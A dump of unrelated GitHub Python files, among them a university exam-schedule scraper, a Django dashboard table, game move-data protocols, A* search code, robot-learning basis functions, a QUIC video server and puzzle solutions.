self.s.get(url, headers=headers)\n soup = BeautifulSoup(index.content, 'html5lib')\n __VIEWSTATE = soup.find('input', id='__VIEWSTATE')['value']\n __VIEWSTATEGENERATOR = soup.find('input', id='__VIEWSTATEGENERATOR')['value']\n __EVENTVALIDATION = soup.find('input', id='__EVENTVALIDATION')['value']\n data = {\n \"__EVENTTARGET\": \"aTc2\",\n \"__EVENTARGUMENT\": \"\",\n \"__VIEWSTATE\": __VIEWSTATE,\n \"__VIEWSTATEGENERATOR\": __VIEWSTATEGENERATOR,\n \"__EVENTVALIDATION\": __EVENTVALIDATION,\n }\n response = self.s.post(url, data=data, headers=headers)\n print(str(self.studentNumber) + \" - \" + str(self.studentName) + \",login out ssuccessfull\")\n\n def getExam(self, studentNumber):\n exam_url = \"http://es.bnuz.edu.cn/jwgl/xskscx.aspx?xh=\" + str(self.studentNumber) + \"&xm=\" + str(\n self.studentName) + \"&gnmkdm=N121604\"\n refer = \"http://es.bnuz.edu.cn/jwgl/xs_main.aspx?xh=\" + str(self.studentNumber)\n header = {\n 'Referer': refer,\n 'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; WOW64) \"\n \"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36\",\n 'Connection': 'keep-alive',\n 'Accept-Encoding': 'gzip,deflate'\n }\n response = self.s.get(exam_url, headers=header)\n soup = BeautifulSoup(response.content, \"lxml\")\n pre = soup.find(id=\"__VIEWSTATE\")\n __VIEWSTATE = (re.findall(r'value=\"(.*)\"', str(pre)))[0]\n ddl_xn_pre = soup.find(id=\"ccd_xn_ClientState\")\n ddl_xn = (re.findall(r'value=\"(.*)\"', str(ddl_xn_pre)))[0]\n ddl_xq_pre = soup.find(id=\"ccd_xq_ClientState\")\n ddl_xq = (re.findall(r'value=\"(.*)\"', str(ddl_xq_pre)))[0]\n formdata = {\n \"ScriptManager1\": \"ScriptManager1|bt_kscx\",\n \"__VIEWSTATEENCRYPTED\": \"\",\n \"__ASYNCPOST\": \"true\",\n \"bt_kscx\": \"考试查询\",\n \"__VIEWSTATE\": __VIEWSTATE,\n \"ccd_xn_ClientState\": str(ddl_xn + \":::\" + ddl_xn),\n \"ccd_xq_ClientState\": str(ddl_xq + \":::\" + ddl_xq),\n \"ddl_xn\": ddl_xn,\n \"ddl_xq\": ddl_xq,\n }\n headers = {\n \"Referer\": refer,\n \"User-Agent\": 
\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36\",\n }\n response = self.s.post(exam_url, headers=headers, data=formdata)\n content = response.content.decode('utf-8')\n soup = BeautifulSoup(content, \"lxml\")\n examTimeOrCourseTime_list = []\n classroom_list = []\n try:\n for i in range(2, 20):\n if i < 10:\n time_pre = soup.find(id=\"gv_ks_ctl\" + \"0\" + str(i) + \"_Label1\")\n time = (re.findall(r'_Label1\">(.*)', str(time_pre)))\n room_pre = soup.find(id=\"gv_ks_ctl\" + \"0\" + str(i) + \"_Label2\")\n room = (re.findall(r'_Label2\">(.*)', str(room_pre)))\n else:\n time_pre = soup.find(id=\"gv_ks_ctl\" + str(i) + \"_Label1\")\n time = (re.findall(r'_Label1\">(.*)', str(time_pre)))\n room_pre = soup.find(id=\"gv_ks_ctl\" + str(i) + \"_Label2\")\n room = (re.findall(r'_Label2\">(.*)', str(room_pre)))\n examTimeOrCourseTime_list.append(str(time)[2:-2])\n classroom_list.append(str(room)[2:-2])\n except AttributeError:\n pass\n time_list = []\n examTimeOrCourseTime_list_true = []\n for i, one in enumerate(examTimeOrCourseTime_list):\n if one != '':\n if one[0] != '*':\n time_list.append(i)\n else:\n examTimeOrCourseTime_list_true.append(one)\n examTimeOrCourseTime_list_true.reverse()\n classroom_list_true = []\n for j, one in enumerate(classroom_list):\n if len(time_list) == 0:\n if one != '':\n classroom_list_true.append(one)\n else:\n if j in time_list:\n continue\n else:\n if one != '':\n classroom_list_true.append(one)\n classroom_list_true.reverse()\n try:\n trs = soup.find(id=\"gv_ks\").findAll(\"tr\")[1:]\n except AttributeError:\n return []\n Exam_list = []\n for tr in trs:\n tds = tr.findAll(\"td\")\n oneExamKeys = [\n \"examIndex\",\n \"classSetDepartment\",\n \"electiveCourseNumber\",\n \"courseName\",\n \"startWeek\",\n \"endWeek\",\n \"examTimeOrCourseTime\",\n \"classroom\",\n \"seatNumber\",\n \"remark\",\n \"slowExamination\"\n ]\n oneExamValues = []\n for td in tds:\n if td.string == 
\"\\xa0\":\n td.string = ''\n oneExamValues.append(td.string)\n oneExam = {}\n oneExam[\"studentNumber\"] = studentNumber\n oneExam_temp = dict((key, value) for key, value in zip(oneExamKeys, oneExamValues))\n oneExam.update(oneExam_temp)\n if oneExam[\"seatNumber\"] == \"未排座位\":\n continue\n Exam_list.append(oneExam)\n for col in Exam_list:\n col[\"classroom\"] = classroom_list_true.pop()\n col[\"examTimeOrCourseTime\"] = examTimeOrCourseTime_list_true.pop()\n time_str = str(col[\"examTimeOrCourseTime\"])\n year = time_str[1:5]\n month = time_str.split(\"年\")[1].split(\"月\")[0]\n day = time_str.split(\"年\")[1].split(\"月\")[1].split(\"日\")[0]\n hour = time_str.split(\"(\")[1][0:2]\n minute = time_str.split(\":\")[1][0:2]\n exam_start_time = year + \"年\" + month + \"月\" + day + \"日\" + hour + \":\" + minute\n col[\"examTimeOrCourseTime\"] = exam_start_time\n while True:\n isExist = t_es_exam.get_or_none(t_es_exam.studentNumber == str(self.studentNumber))\n if isExist:\n s = t_es_exam.get(t_es_exam.studentNumber == str(self.studentNumber))\n s.delete_instance()\n else:\n break\n for each in Exam_list:\n single = t_es_exam(\n studentNumber=str(self.studentNumber),\n examIndex=each['examIndex'],\n classSetDepartment=each['classSetDepartment'],\n electiveCourseNumber=each['electiveCourseNumber'],\n courseName=each['courseName'],\n startWeek=each['startWeek'],\n endWeek=each['endWeek'],\n examTimeOrCourseTime=each['examTimeOrCourseTime'],\n classroom=each['classroom'],\n seatNumber=each['seatNumber'],\n remark=each['remark'],\n slowExamination=each['slowExamination'],\n )\n single.save(force_insert=True)\n return Exam_list\n\n\ndef go(studentNumber, studentPassword):\n start = time.clock()\n unsuccessful_list = pd.DataFrame(data=[])\n i = 0\n while i < 1:\n if 1:\n print()\n print('No.' 
+ str(i))\n try:\n current_student = student(studentNumber, studentPassword)\n current_student.getCheckCodeImage()\n orginalCheckCode = identifyRandcode.identify_randcode(\n 'image/original_img.jpg',\n 'image/adjusted_img.jpg')\n checkCode = orginalCheckCode[0:5]\n current_student.login(checkCode)\n except IndexError:\n time.sleep(1)\n print('——PasswordOrRandcode Error——Again, KillRandcode——')\n try:\n current_student = student(studentNumber, studentPassword)\n current_student.getCheckCodeImage()\n orginalCheckCode = identifyRandcode.identify_randcode(\n 'image/original_img.jpg',\n 'image/adjusted_img.jpg')\n checkCode = orginalCheckCode[0:5]\n current_student.login(checkCode)\n except IndexError:\n time.sleep(1)\n reason = 'wrong password'\n print(reason)\n if reason == 'wrong password':\n return 4001\n error_info = t_unsuccessful_list(serialNumber=i, studentNumber=studentNumber,\n studentPassword=studentPassword, reason=reason)\n error_info.save()\n else:\n print(\"login successfully!\")\n try:\n Exam_list = current_student.getExam(studentNumber)\n except IndexError:\n reason = 'outside school'\n print(reason)\n error_info = t_unsuccessful_list(serialNumber=i, studentNumber=studentNumber,\n studentPassword=studentPassword, reason=reason)\n error_info.save()\n else:\n current_student.login_out()\n print(\"successfully!\")\n else:\n print(\"login successfully!\")\n try:\n Exam_list = current_student.getExam(studentNumber)\n except IndexError:\n reason = 'outside school'\n print(reason)\n error_info = t_unsuccessful_list(serialNumber=i, studentNumber=studentNumber,\n studentPassword=studentPassword, reason=reason)\n error_info.save()\n else:\n current_student.login_out()\n print(\"successfully!\")\n else:\n pass\n i = i + 1\n end = time.clock()\n print(end - start)\n t_exam = dict(\n {\n 'exam': Exam_list\n }\n )\n return 
t_exam\n","repo_name":"Feuoy/zhengfang-spider","sub_path":"go/table_exam.py","file_name":"table_exam.py","file_ext":"py","file_size_in_byte":13433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"39445326542","text":"from django.utils.translation import gettext_lazy as _\n\nfrom django_tables2 import TemplateColumn, A, Column\n\nfrom champsquarebackend.core.loading import get_model, get_class\n\nDashboardTable = get_class('dashboard.tables', 'DashboardTable')\nVideoRecord = get_model('monitoring', 'videorecord')\n\n\nclass VideoRecordTable(DashboardTable):\n id = TemplateColumn(\n verbose_name=_('Id'),\n template_name='champsquarebackend/dashboard/records/videos_row_id.html',\n orderable=False\n )\n\n user = TemplateColumn(\n verbose_name=_('User'),\n template_name='champsquarebackend/dashboard/records/videos_row_user.html',\n orderable=False\n )\n\n type = Column(\n verbose_name=_('Type'),\n orderable=True, accessor=('type')\n )\n\n start_time = Column(\n verbose_name=_('Start Time'),\n orderable=True, accessor=('created_at')\n )\n\n is_processed = Column(\n verbose_name=_('Is Processed?'),\n orderable=True, accessor=('is_processed'))\n\n actions = TemplateColumn(\n verbose_name=_('Actions'),\n template_name='champsquarebackend/dashboard/records/videos_row_actions.html',\n orderable=False)\n\n icon = \"group\"\n\n class Meta(DashboardTable.Meta):\n model = VideoRecord\n fields = ()\n sequence = ('counter', 'id', 'user', 'type', 'start_time', 'is_processed', 'actions')\n","repo_name":"ChampSquare/ChampionSquareBackend","sub_path":"champsquarebackend/apps/dashboard/records/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10759483964","text":"from __future__ import annotations\n\nfrom abc import abstractmethod\nfrom enum import Enum\nfrom typing import MutableSequence, 
Protocol, TypeVar, Sequence\n\nfrom range_typed_integers import u8, u16, u32\n\nfrom skytemple_files.common.i18n_util import _\nfrom skytemple_files.container.sir0.sir0_serializable import Sir0Serializable\n\n\n_WazaMoveCategory = u8\n_PokeType = u8\n\n\nclass WazaMoveCategory(Enum):\n PHYSICAL = 0, _(\"Physical Move\")\n SPECIAL = 1, _(\"Special Move\")\n STATUS = 2, _(\"Status Move\")\n\n def __new__(cls, *args, **kwargs): # type: ignore\n obj = object.__new__(cls)\n obj._value_ = args[0]\n return obj\n\n # ignore the first param since it's already set by __new__\n def __init__(self, _: int, name_localized: str):\n self.name_localized = name_localized\n\n def __str__(self):\n return f\"WazaMoveCategory.{self.name}\"\n\n def __repr__(self):\n return str(self)\n\n @property\n def print_name(self):\n return self.name_localized\n\n\nclass WazaMoveRangeTarget(Enum):\n ENEMIES = 0, _(\"Enemies\")\n ALLIES = 1, _(\"Allies\")\n EVERYONE = 2, _(\"Everyone\")\n USER = 3, _(\"User\")\n TWO_TURN = 4, _(\"Two-turn move\")\n EVERYONE_EXCEPT_USER = 5, _(\"Everyone except user\")\n ALLIES_EXCEPT_USER = 6, _(\"All allies except user\")\n U7 = 7, _(\"Invalid \") + \"7\"\n U8 = 8, _(\"Invalid \") + \"8\"\n U9 = 9, _(\"Invalid \") + \"9\"\n U10 = 10, _(\"Invalid \") + \"10\"\n U11 = 11, _(\"Invalid \") + \"11\"\n U12 = 12, _(\"Invalid \") + \"12\"\n U13 = 13, _(\"Invalid \") + \"13\"\n U14 = 14, _(\"Invalid \") + \"14\"\n SPECIAL = 15, _(\"Special / Invalid\")\n\n def __new__(cls, *args, **kwargs): # type: ignore\n obj = object.__new__(cls)\n obj._value_ = args[0]\n return obj\n\n # ignore the first param since it's already set by __new__\n def __init__(self, _: int, name_localized: str):\n self.name_localized = name_localized\n\n def __str__(self):\n return f\"WazaMoveRangeTarget.{self.name}\"\n\n def __repr__(self):\n return str(self)\n\n @property\n def print_name(self):\n return self.name_localized\n\n\nclass WazaMoveRangeRange(Enum):\n IN_FRONT = 0, _(\"In front\")\n 
TRHEE_IN_FRONT = 1, _(\"In front + adjacent (like Wide Slash)\")\n AROUND = 2, _(\"8 tiles around user\")\n ROOM = 3, _(\"Room\")\n TWO_TILES = 4, _(\n \"Two tiles away\"\n ) # Also cuts corners, but the AI doesn't account for that\n STRAIGHT_LINE = 5, _(\"Straight line\")\n FLOOR = 6, _(\"Floor\")\n USER = 7, _(\"User\")\n IN_FRONT_CORNERS = 8, _(\"In front; cuts corners\")\n TWO_TILES_CORNERS = 9, _(\"Two tiles away; cuts corners\")\n U10 = 10, _(\"Invalid \") + \"10\"\n U11 = 11, _(\"Invalid \") + \"11\"\n U12 = 12, _(\"Invalid \") + \"12\"\n U13 = 13, _(\"Invalid \") + \"13\"\n U14 = 14, _(\"Invalid \") + \"14\"\n SPECIAL = 15, _(\"Special / Invalid\")\n\n def __new__(cls, *args, **kwargs): # type: ignore\n obj = object.__new__(cls)\n obj._value_ = args[0]\n return obj\n\n # ignore the first param since it's already set by __new__\n def __init__(self, _: int, name_localized: str):\n self.name_localized = name_localized\n\n def __str__(self):\n return f\"WazaMoveRangeRange.{self.name}\"\n\n def __repr__(self):\n return str(self)\n\n @property\n def print_name(self):\n return self.name_localized\n\n\nclass WazaMoveRangeCondition(Enum):\n \"\"\"Only relevant for AI setting.\"\"\"\n\n NO_CONDITION = 0, _(\"No condition\")\n CHANCE_AI_WEIGHT = 1, _(\"Based on AI Condition 1 Chance\")\n CRITICAL_HP = 2, _(\"Current HP <= 25%\")\n NEGATIVE_STATUS = 3, _(\"Has at least one negative status condition\")\n ASLEEP = 4, _(\"Is asleep, in a nightmare or napping\")\n GHOST = 5, _(\"Is a ghost-type Pokémon and does not have the exposed status\")\n CRITICAL_HP_NEGATIVE_STATUS = 6, _(\n \"Current HP <= 25% or has at least one negative status condition\"\n )\n U7 = 7, _(\"Invalid \") + \"7\"\n U8 = 8, _(\"Invalid \") + \"8\"\n U9 = 9, _(\"Invalid \") + \"9\"\n U10 = 10, _(\"Invalid \") + \"10\"\n U11 = 11, _(\"Invalid \") + \"11\"\n U12 = 12, _(\"Invalid \") + \"12\"\n U13 = 13, _(\"Invalid \") + \"13\"\n U14 = 14, _(\"Invalid \") + \"14\"\n U15 = 15, _(\"Invalid \") + \"15\"\n\n 
def __new__(cls, *args, **kwargs): # type: ignore\n obj = object.__new__(cls)\n obj._value_ = args[0]\n return obj\n\n # ignore the first param since it's already set by __new__\n def __init__(self, _: int, name_localized: str):\n self.name_localized = name_localized\n\n def __str__(self):\n return f\"WazaMoveRangeCondition.{self.name}\"\n\n def __repr__(self):\n return str(self)\n\n @property\n def print_name(self):\n return self.name_localized\n\n\nclass LevelUpMoveProtocol(Protocol):\n move_id: u16\n level_id: u16\n\n @abstractmethod\n def __init__(self, move_id: u16, level_id: u16):\n ...\n\n @abstractmethod\n def __eq__(self, other: object) -> bool:\n ...\n\n\nLUM = TypeVar(\"LUM\", bound=LevelUpMoveProtocol)\n\n\nclass MoveLearnsetProtocol(Protocol[LUM]):\n level_up_moves: MutableSequence[LUM]\n tm_hm_moves: MutableSequence[u32]\n egg_moves: MutableSequence[u32]\n\n @abstractmethod\n def __init__(\n self,\n level_up_moves: Sequence[LUM],\n tm_hm_moves: Sequence[u32],\n egg_moves: Sequence[u32],\n ):\n ...\n\n @abstractmethod\n def __eq__(self, other: object) -> bool:\n ...\n\n\nclass WazaMoveRangeSettingsProtocol(Protocol):\n target: int\n range: int\n condition: int\n unused: int\n\n @abstractmethod\n def __init__(self, data: bytes):\n ...\n\n @abstractmethod\n def __int__(self):\n ...\n\n @abstractmethod\n def __eq__(self, other: object) -> bool:\n ...\n\n\nR = TypeVar(\"R\", bound=WazaMoveRangeSettingsProtocol)\n\n\nclass WazaMoveProtocol(Protocol[R]):\n base_power: u16\n type: _PokeType\n category: _WazaMoveCategory\n settings_range: R\n settings_range_ai: R\n base_pp: u8\n ai_weight: u8\n miss_accuracy: u8\n accuracy: u8\n ai_condition1_chance: u8\n number_chained_hits: u8\n max_upgrade_level: u8\n crit_chance: u8\n affected_by_magic_coat: bool\n is_snatchable: bool\n uses_mouth: bool\n ai_frozen_check: bool\n ignores_taunted: bool\n range_check_text: u8\n move_id: u16\n message_id: u8\n\n @abstractmethod\n def __init__(self, data: bytes):\n ...\n\n 
@abstractmethod\n def to_bytes(self) -> bytes:\n ...\n\n @abstractmethod\n def __eq__(self, other: object) -> bool:\n ...\n\n\nM = TypeVar(\"M\", bound=WazaMoveProtocol)\nL = TypeVar(\"L\", bound=MoveLearnsetProtocol)\n\n\nclass WazaPProtocol(Sir0Serializable, Protocol[M, L]):\n moves: MutableSequence[M]\n learnsets: MutableSequence[L]\n\n @abstractmethod\n def __init__(self, data: bytes, waza_content_pointer: int):\n ...\n\n @abstractmethod\n def __eq__(self, other: object) -> bool:\n ...\n","repo_name":"SkyTemple/skytemple-files","sub_path":"skytemple_files/data/waza_p/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":6917,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"18"} +{"seq_id":"15080632621","text":"#def heuristic(node, goal): # Calculates the admissible heuristic of a node\r\n # I know the format is [X,Y]\r\n # node = node.replace('[', '') # remove brackets\r\n # node = node.replace(']', '')\r\n # x, y = node.split(',', maxsplit=2) # Split values by ,\r\n #x = float(x)\r\n #y = float(y)\r\n #return abs(x - 9) + abs(y - 9) # Return calculation of admissible heuristic (manhattan distance)\r\nfrom queue import PriorityQueue\r\n\r\ndef heuristic(nxobject, node, goal):\r\n neighbours = nxobject.neighbors(node['label'])\r\n for n in neighbours:\r\n out_zone = nxobject[node['label']][n]['main_zone']\r\n if goal == out_zone:\r\n out_weight = out_weight - 2\r\n nxobject[node['label']][n]['weight'] = out_weight\r\n\r\n return None\r\n\r\n\r\ndef Astar(nxobject, initial, goal):\r\n admissible_heuristics = {} # Will save the values of h so i don't need to calculate multiple times for every node\r\n h = heuristic(initial)\r\n admissible_heuristics[initial] = h\r\n visited_nodes = {} # This will contain the data of how to get to any node\r\n visited_nodes[initial] = (h, [\r\n initial]) # I add the data for the origin node: \"Travel cost + heuristic\", \"Path to get there\" and \"Admissible 
Heuristic\"\r\n\r\n paths_to_explore = PriorityQueue()\r\n paths_to_explore.put((h, [initial], 0)) # Add the origin node to paths to explore, also add cost without h\r\n # I add the total cost, as well as the path to get there (they will be sorted automatically)\r\n\r\n while not paths_to_explore.empty(): # While there are still paths to explore\r\n # Pop elemenet with lower path cost in the queue\r\n _, path, total_cost = paths_to_explore.get()\r\n current_node = path[-1]\r\n neighbors = nxobject.neighbors(current_node) # I get all the neighbors of the current path\r\n\r\n for neighbor in neighbors:\r\n edge_data = nxobject.get_edge_data(path[-1], neighbor)\r\n if \"weight\" in edge_data:\r\n cost_to_neighbor = edge_data[\"weight\"] # If the graph has weights\r\n else:\r\n cost_to_neighbor = 1 # If the graph does not have weights I use 1\r\n\r\n if neighbor in admissible_heuristics:\r\n h = admissible_heuristics[neighbor]\r\n else:\r\n h = heuristic(neighbor)\r\n admissible_heuristics[neighbor] = h\r\n\r\n new_cost = total_cost + cost_to_neighbor\r\n new_cost_plus_h = new_cost + h\r\n if (neighbor not in visited_nodes) or (visited_nodes[neighbor][\r\n 0] > new_cost_plus_h): # If this node was never explored, or the cost to get there is better than te previous ones\r\n next_node = (new_cost_plus_h, path + [neighbor], new_cost)\r\n visited_nodes[neighbor] = next_node # Update the node with best value\r\n paths_to_explore.put(next_node) # Also will add it as a possible path to explore\r\n\r\n return visited_nodes[goal] # I will return the goal information, it will have both the total cost and the path\r\n\r\nimport bisect\r\n\r\ndef abstract():\r\n import inspect\r\n caller = inspect.getouterframes(inspect.currentframe())[1][3]\r\n raise NotImplementedError(caller + ' must be implemented in subclass')\r\n\r\ndef todo():\r\n raise NotImplementedError('You must complete the implementation.')\r\n\r\nclass Queue:\r\n \"\"\"Queue is an abstract class/interface. 
There are three types:\r\n FIFOQueue(): A First In First Out Queue.\r\n LIFOQueue(): A Last In First Out Queue.\r\n PriorityQueue(order, f): Queue in sorted order (default min-first).\r\n Each type supports the following methods and functions:\r\n q.append(item) -- add an item to the queue\r\n q.pop() -- return the top item from the queue\r\n len(q) -- number of items in q (also q.__len())\r\n item in q -- does q contain item?\r\n \"\"\"\r\n\r\n def append(self, item):\r\n abstract()\r\n\r\n def pop(self):\r\n abstract()\r\n\r\n\r\n\r\n\r\n\r\nclass PriorityQueue(Queue):\r\n \"\"\"A queue in which the minimum element (as determined by cost_function)\r\n is returned first. Also supports dict-like lookup.\r\n \"\"\"\r\n\r\n def __init__(self, cost_function=lambda x: x):\r\n self.A = []\r\n self.cost_function = cost_function\r\n\r\n def append(self, item):\r\n bisect.insort(self.A, (self.cost_function(item), item))\r\n\r\n def pop(self):\r\n return self.A.pop(0)[1]\r\n\r\n def __contains__(self, item):\r\n for _, x in self.A:\r\n if item == x:\r\n return True\r\n return False\r\n\r\n def __len__(self):\r\n return len(self.A)\r\n\r\n def __repr__(self):\r\n \"\"\"Return [A[0], A[1], ...]\"\"\"\r\n\r\n rep = \"[\"\r\n rep += str(self.A[0][1]) + \":\" + str(self.A[0][0])\r\n for i in range(1, len(self.A)):\r\n rep += \", \" + str(self.A[i][1]) + \":\" + str(self.A[i][0])\r\n\r\n rep += \"]\"\r\n\r\n return rep\r\n\r\n # For dict-like operations\r\n def __getitem__(self, key):\r\n for _, item in self.A:\r\n if item == key:\r\n return item\r\n\r\n def __delitem__(self, key):\r\n for i, (_, item) in enumerate(self.A):\r\n if item == key:\r\n self.A.pop(i)\r\n return\r\n\r\n\r\nclass Node:\r\n \"\"\"A node in a search tree. Contains a pointer to the parent (the node\r\n that this is a successor of) and to the actual state for this node. Note\r\n that if a state is arrived at by two paths, then there are two nodes with\r\n the same state. 
Also includes the action that got us to this state, and\r\n the total path_cost (also known as g) to reach the node. You will not need to\r\n subclass this class.\"\"\"\r\n\r\n def __init__(self, state, parent=None, action=None, path_cost=0):\r\n \"Create a search tree Node, derived from a parent by an action.\"\r\n\r\n self.state = state\r\n self.parent = parent\r\n self.action = action\r\n self.path_cost = path_cost\r\n\r\n self.depth = 0\r\n if parent:\r\n self.depth = parent.depth + 1\r\n\r\n def __repr__(self):\r\n return \"\" % (self.state,)\r\n\r\n def __lt__(self, node):\r\n return self.state < node.state\r\n\r\n def expand(self, problem):\r\n \"List the nodes reachable in one step from this node.\"\r\n return [self.child_node(problem, action)\r\n for action in problem.actions(self.state)]\r\n\r\n def child_node(self, problem, action):\r\n \"Fig. 3.10\"\r\n next_node = problem.result(self.state, action)\r\n return Node(next_node, self, action,\r\n problem.path_cost(self.path_cost, self.state, action, next_node))\r\n\r\n def solution(self):\r\n \"Return the sequence of actions to go from the root to this node.\"\r\n return [node.action for node in self.path()[1:]]\r\n\r\n def path(self):\r\n \"Return a list of nodes forming the path from the root to this node.\"\r\n node, path_back = self, []\r\n while node:\r\n path_back.append(node)\r\n node = node.parent\r\n return list(reversed(path_back))\r\n\r\n # We want for a queue of nodes in breadth_first_search or\r\n # astar_search to have no duplicated states, so we treat nodes\r\n # with the same state as equal. 
[Problem: this may not be what you\r\n # want in other contexts.]\r\n\r\n def __eq__(self, other):\r\n return isinstance(other, Node) and self.state == other.state\r\n\r\n def __hash__(self):\r\n return hash(self.state)\r\n\r\n\r\ndef best_first_tree_search(nxobject, cost_function):\r\n \"\"\"Search the nodes with the lowest cost_function scores first.\r\n You specify the function cost_function(node) that you want to minimize\r\n \"\"\"\r\n node = Node(nxobject.initial)\r\n if nxobject.goal_test(node.state):\r\n return node\r\n frontier = PriorityQueue(cost_function)\r\n frontier.append(node)\r\n while frontier:\r\n node = frontier.pop()\r\n if nxobject.goal_test(node.state):\r\n return node\r\n for child in node.expand(nxobject):\r\n frontier.append(child)\r\n return None\r\n\r\n\r\ndef best_first_graph_search(nxobject, cost_function):\r\n \"\"\"Search the nodes with the lowest cost_function scores first.\r\n You specify the function cost_function(node) that you want to minimize.\r\n Remember the states you have explored and generated.\r\n \"\"\"\r\n node = Node(nxobject.initial)\r\n if nxobject.goal_test(node.state):\r\n return node\r\n frontier = PriorityQueue(cost_function)\r\n frontier.append(node)\r\n explored = set()\r\n while frontier:\r\n node = frontier.pop()\r\n if nxobject.goal_test(node.state):\r\n return node\r\n explored.add(node.state)\r\n for child in node.expand(nxobject):\r\n if child.state not in explored and child not in frontier:\r\n frontier.append(child)\r\n elif child in frontier:\r\n incumbent = frontier[child]\r\n if cost_function(child) < cost_function(incumbent): # Check if a better path is found\r\n del frontier[incumbent]\r\n frontier.append(child)\r\n return None\r\n\r\n\r\ndef greedy_best_first_search(problem, h, search_type=best_first_tree_search):\r\n return search_type(problem, lambda node: h(node))\r\n\r\n\r\ndef astar_search(problem, h, search_type=best_first_tree_search):\r\n return search_type(problem, lambda node: 
node.path_cost + h(node))","repo_name":"Palak-Dhanadia/Artificial-Intelligence","sub_path":"Assignment 1/Code/Heuristic.py","file_name":"Heuristic.py","file_ext":"py","file_size_in_byte":9507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40568979798","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef getProMPBasis(dt, nSteps, n_of_basis, bandwidth):\n # (2, 1499)\n time = np.arange(dt, nSteps * dt, dt)\n nBasis = n_of_basis\n T = nSteps * dt\n\n C = np.random.uniform(-2*bandwidth, T+2*bandwidth, nBasis)\n\n #X = 1 # Canonical system\n Phi = np.zeros((nSteps, nBasis))\n\n for k in range(nSteps):\n for j in range(nBasis):\n Phi[k, j] = np.exp(-0.5 * (time[k] - C[j]) ** 2/bandwidth ** 2) # Basis function activation over time\n Phi[k, :] = (Phi[k, :] * time[k]) / np.sum(Phi[k, :]) # Normalize basis functions and weight by canonical state\n\n return Phi\n\n#show the basis functions\n# dt = 0.002\n# nSteps = 1499\n# N = 30\n# bandwidth = 0.2\n# time = np.arange(dt, nSteps * dt, dt)\n# Phi = getProMPBasis(dt, nSteps, N, bandwidth)\n# print(Phi)\n# plt.plot(time, Phi)\n# plt.savefig('f_basis.pdf')\n# #plt.legend()\n# plt.show()\n","repo_name":"smallsmallstrong/Exercise-Robot-Learning","sub_path":"HW4/getProMPBasis.py","file_name":"getProMPBasis.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71941028839","text":"import argparse\r\nimport asyncio\r\nimport struct\r\nfrom asyncio import Queue\r\nfrom collections import deque\r\n\r\nfrom aioquic.asyncio import serve\r\nfrom aioquic.quic.configuration import QuicConfiguration\r\nfrom src.structures.queues import StrictPriorityQueue, WeightedFairQueue\r\nfrom src.structures.data_types import VideoRequestMessage, VideoPacket\r\nfrom src.utils import message_to_quic_packet, get_server_file_name, server_file_exists\r\nfrom 
src.constants.video_constants import CLOSE_REQUEST, TILE_REQUEST, PUSH_REQUEST, WFQ_QUEUE, SP_QUEUE, \\\r\n N_SEGMENTS, PUSH_CANCEL, HIGHEST_PRIORITY, PUSH_RECEIVED, INITIAL_BUFFER_SIZE\r\n\r\n\r\ndef handle_stream(reader, writer):\r\n asyncio.ensure_future(handle_echo(reader, writer))\r\n\r\n\r\nasync def handle_echo(reader, writer):\r\n closed = False\r\n\r\n if Queue_Type == WFQ_QUEUE:\r\n queue = WeightedFairQueue()\r\n elif Queue_Type == SP_QUEUE:\r\n queue = StrictPriorityQueue()\r\n else:\r\n queue = Queue()\r\n\r\n name = await reader.read(1024)\r\n\r\n print(\"Connection with \"+str(name.decode()))\r\n\r\n asyncio.ensure_future(receive(reader, queue))\r\n while not closed:\r\n video_request = await queue.get()\r\n if video_request.message_type == CLOSE_REQUEST:\r\n closed = True\r\n else:\r\n await send(video_request, writer)\r\n\r\n\r\nasync def receive(reader, queue):\r\n last_segment = 1\r\n tiles_priority = deque()\r\n previous_tiles_priority = deque()\r\n segment = 1\r\n closed = False\r\n is_pushing = False\r\n\r\n sent_segments = [False for i in range(1, N_SEGMENTS+1)]\r\n\r\n is_push_allowed = Server_Push\r\n\r\n while not closed:\r\n try:\r\n read_data = await asyncio.wait_for(reader.readexactly(4), timeout=0.005)\r\n size, = struct.unpack('= user[1]: # 이모티콘 구매 비용이 넘어가면\n subscriber += 1 # 이모티콘 플러스 서비스에 가입\n else:\n sales += emo_sum\n answer.append([subscriber, sales]) # 일단 모든 경우의 수 다 넣어놓고\n answer = max(i for i in answer) # 정렬\n return answer","repo_name":"jun6292/Algorithm","sub_path":"프로그래머스/unrated/150368. 
이모티콘 할인행사/이모티콘 할인행사.py","file_name":"이모티콘 할인행사.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"12205426373","text":"#!/usr/bin/env python3\n\nfrom collections import deque, namedtuple\nfrom hashlib import md5\n\n\ndirns = ((b'U', 0, -1),\n (b'D', 0, 1),\n (b'L', -1, 0),\n (b'R', 1, 0))\n\nNode = namedtuple('Node', ('letter', 'x', 'y'))\nPath = namedtuple('Path', ('nodes', 'hash'))\n\n\ndef path_to_str(path):\n return ''.join(p.letter.decode() for p in path.nodes)\n\n\ndef grow_path(path, xdel, ydel, dirn, hexit):\n last = path.nodes[-1]\n x, y = last.x + xdel, last.y + ydel\n if not (0 <= x < 4 and 0 <= y < 4 and\n hexit >= 'b'):\n return None\n\n new_hash = path.hash.copy()\n new_hash.update(dirn)\n return Path(nodes=path.nodes + [Node(dirn, x, y)], hash=new_hash)\n\n\ndef run(pwd, expected=None):\n root_hash = md5()\n root_hash.update(pwd.encode())\n start = Path(nodes=[Node(b'', 0, 0)], hash=root_hash)\n frontier = deque()\n frontier.append(start)\n\n while True:\n path = frontier.popleft()\n last = path.nodes[-1]\n if (last.x, last.y) == (3, 3):\n 